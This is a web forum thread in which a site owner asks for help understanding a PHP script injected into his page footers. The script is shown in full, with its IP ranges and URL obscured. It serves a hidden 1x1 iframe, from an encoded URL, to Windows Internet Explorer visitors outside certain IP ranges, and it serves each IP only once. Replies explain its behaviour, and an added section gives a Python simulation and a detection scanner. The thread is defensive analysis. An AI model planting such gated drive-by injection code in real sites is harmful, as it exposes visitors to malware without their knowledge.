
Site Compromised. Need Help Understanding This Script


Dead_Elvis

5:24 pm on Mar 11, 2011 (gmt 0)

5+ Year Member



Hi,

I don't know if this is the correct forum for this or not, so please excuse me if I'm not in the correct place.

This morning I kind of accidentally discovered that my site had been compromised. What I found was this script being loaded in the footer of my pages.

I don't know enough about the code used to understand what it does... would anyone like to help me figure it out?

Thanks in advance!

<?
// Returns true when $ip falls inside $network; the part after "/" may be a
// prefix length ("/19") or a dotted netmask ("/255.255.224.0")
function net_match ( $network , $ip ) {
    $ip_arr = explode ( '/' , $network );
    $network_long = ip2long ( $ip_arr [ 0 ]);
    $x = ip2long ( $ip_arr [ 1 ]);
    $mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
    $ip_long = ip2long ( $ip );
    return ( $ip_long & $mask ) == ( $network_long & $mask );
}

// Returns true only when the visitor's IP is outside every listed range
// (ranges obscured by the moderator); visitors inside them never get the payload
function net()
{
    $ip=$_SERVER['REMOTE_ADDR'];

    if(
        net_match('64.***.160.0/19',$ip)==0 &&
        net_match('66.***.0.0/20',$ip)==0 &&
        net_match('66.***.64.0/19',$ip)==0 &&
        net_match('72.***.192.0/18',$ip)==0 &&
        net_match('74.***.0.0/16',$ip)==0 &&
        net_match('89.***.224.0/24',$ip)==0 &&
        net_match('193.***.125.0/24',$ip)==0 &&
        net_match('194.***.194.0/24',$ip)==0 &&
        net_match('209.***.128.0/17',$ip)==0 &&
        net_match('216.***.32.0/19',$ip)==0 &&
        net_match('128.***.0.0/16',$ip)==0 &&
        net_match('67.***.0.0/16',$ip)==0 &&
        net_match('188.***.0.0/16',$ip)==0
    )
        return true;
}

// Sets $os only when the user agent says Windows
function detect_os() {
    global $os;
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    if(strpos($user_agent, "Windows") !== false) $os = 'windows';
}
detect_os();

// Flags Internet Explorer 6, 7 and 8 (variable names are obfuscated)
function detect_brows() {
    global $OOOOO0000, $OOOOOO000;
    $user_agent = $_SERVER["HTTP_USER_AGENT"];
    if (preg_match("/MSIE 6.0/", $user_agent) OR
        preg_match("/MSIE 7.0/", $user_agent) OR
        preg_match("/MSIE 8.0/", $user_agent)
    ) $OOOOOO000 = "MSIE";
}
detect_brows();

// One marker file per visitor IP under /tmp/freshnews
$IP = "{$_SERVER[REMOTE_ADDR]}.log";

function _log()
{
    global $IP;
    touch ("/tmp/freshnews/{$IP}");
}

// True only if this IP has not been served before: each IP gets the payload once
function _check()
{
    global $IP;
    if(!file_exists("/tmp/freshnews/{$IP}")) return true;
}

$sfkg=base64_decode('[alphanumeric string]'); // decoded iframe URL (obscured)
if(_check())
{
    if(net())
    {
        if($os)
        {
            if($OOOOOO000 == "MSIE")
            {
                // Emits JavaScript that writes a 1x1 hidden iframe, then records the IP
                echo 'document.write(\'<iframe frameborder=0 src="'.$sfkg.'" width=1 height=1 scrolling=no></iframe>\');';

                _log();
            }
        }
    }
}

[edited by: tedster at 7:33 pm (utc) on Mar 12, 2011]
[edit reason] obscure specifics [/edit]

topr8

5:47 pm on Mar 11, 2011 (gmt 0)

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member



it doesn't matter what it does, you've got to patch the hole in your security.

... at a glance it serves an iframe, doubtless with a dubious source, to Internet Explorer users who are not from the IP ranges shown
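As an added example (not part of this thread or of the script posted above): a Python model of the gate chain topr8 describes, so a site owner can see which visitors would get the hidden iframe and why others (including the owner, on a repeat visit) would see a clean page, plus a small indicator scan for the same pattern in PHP files. The network ranges, IP addresses, user-agent strings, sample PHP and function names here are constructed by me, not values from the thread; the real ranges and URL were obscured by the moderator and are not reproduced.

```python
import ipaddress
import re

# Constructed placeholder ranges (RFC 5737 documentation blocks). The ranges in
# the thread were obscured by the moderator, so none of them appear here.
EXCLUDED_NETWORKS = ["203.0.113.0/24", "198.51.100.0/24", "192.0.2.0/255.255.255.0"]

# The browsers the script targets: Windows plus IE 6, 7 or 8.
MSIE_RE = re.compile(r"MSIE [678]\.0")


def net_match(network: str, ip: str) -> bool:
    """Same test as the script's net_match(): the part after '/' may be a prefix
    length ('/19') or a dotted netmask ('/255.255.224.0')."""
    base, suffix = network.split("/")
    return ipaddress.ip_address(ip) in ipaddress.ip_network(f"{base}/{suffix}", strict=False)


def would_be_served(ip: str, user_agent: str, already_seen: bool):
    """Walks the script's gate chain _check() -> net() -> $os -> MSIE and returns
    (served, reason) so every refusal is explained."""
    if already_seen:
        return False, "marker file exists: this IP was already served once"
    if any(net_match(n, ip) for n in EXCLUDED_NETWORKS):
        return False, "visitor IP is inside an excluded range"
    if "Windows" not in user_agent:
        return False, "user agent is not Windows"
    if not MSIE_RE.search(user_agent):
        return False, "user agent is not MSIE 6/7/8"
    return True, "all gates passed: hidden iframe would be written"


def simulate_visits(visits):
    """Replays a list of (ip, user_agent) visits. The 'seen' set stands in for the
    per-IP marker files the script touches in /tmp/freshnews after serving."""
    seen = set()
    outcome = []
    for ip, ua in visits:
        served, reason = would_be_served(ip, ua, ip in seen)
        if served:
            seen.add(ip)  # _log(): from now on this IP gets a clean page
        outcome.append((ip, served, reason))
    return outcome


# Textual indicators of this injection pattern, for a quick scan of PHP files.
INDICATORS = {
    "base64_decode": re.compile(r"base64_decode\s*\("),
    "hidden_iframe": re.compile(r"<iframe[^>]*width=1\b[^>]*height=1\b", re.I),
    "ua_gating": re.compile(r"HTTP_USER_AGENT"),
    "ip_gating": re.compile(r"REMOTE_ADDR"),
    "tmp_marker": re.compile(r"/tmp/\w+/\{?\$"),
}


def scan_php(source: str):
    """Returns the sorted names of indicators found in one file's contents."""
    return sorted(name for name, pat in INDICATORS.items() if pat.search(source))


# Constructed sample mirroring the shape of the posted script; the base64 string
# is a placeholder, not the real one.
SAMPLE_PHP = r"""<?php
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
$u = base64_decode('PLACEHOLDER_BASE64');
if (!file_exists("/tmp/freshnews/{$ip}.log")) {
    echo 'document.write(\'<iframe frameborder=0 src="'.$u.'" width=1 height=1 scrolling=no></iframe>\');';
}
"""

if __name__ == "__main__":
    ie7 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"  # constructed UA
    ff = "Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0"  # constructed UA
    visits = [("198.18.0.5", ie7), ("198.18.0.5", ie7), ("203.0.113.9", ie7), ("198.18.0.6", ff)]
    for ip, served, reason in simulate_visits(visits):
        print(f"{ip:12} served={served!s:5} {reason}")
    print("indicators:", scan_php(SAMPLE_PHP))
```

The second visit from the same IP is refused by the marker-file check, which is why an owner who loads the page once from a targeted browser and then reloads it will not see the iframe again; the scan function is deliberately crude and is meant to shortlist files for manual review, not to replace a full file-integrity comparison against a known-clean copy.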

Dead_Elvis

5:52 pm on Mar 11, 2011 (gmt 0)

5+ Year Member



Thanks topr8,

Yes, I am in the process of finding and patching the hole. They seem to have accessed the site via FTP.

It seemed like knowing what the script does would help me find any other compromised files, directories, etc.

Thanks again.

jimbeetle

6:06 pm on Mar 11, 2011 (gmt 0)

WebmasterWorld Senior Member jimbeetle is a WebmasterWorld Top Contributor of All Time 10+ Year Member



They seem to have accessed the site via FTP

Then be sure to check your local machine for a keylogger, scrub it good if one is found, then change all your passwords.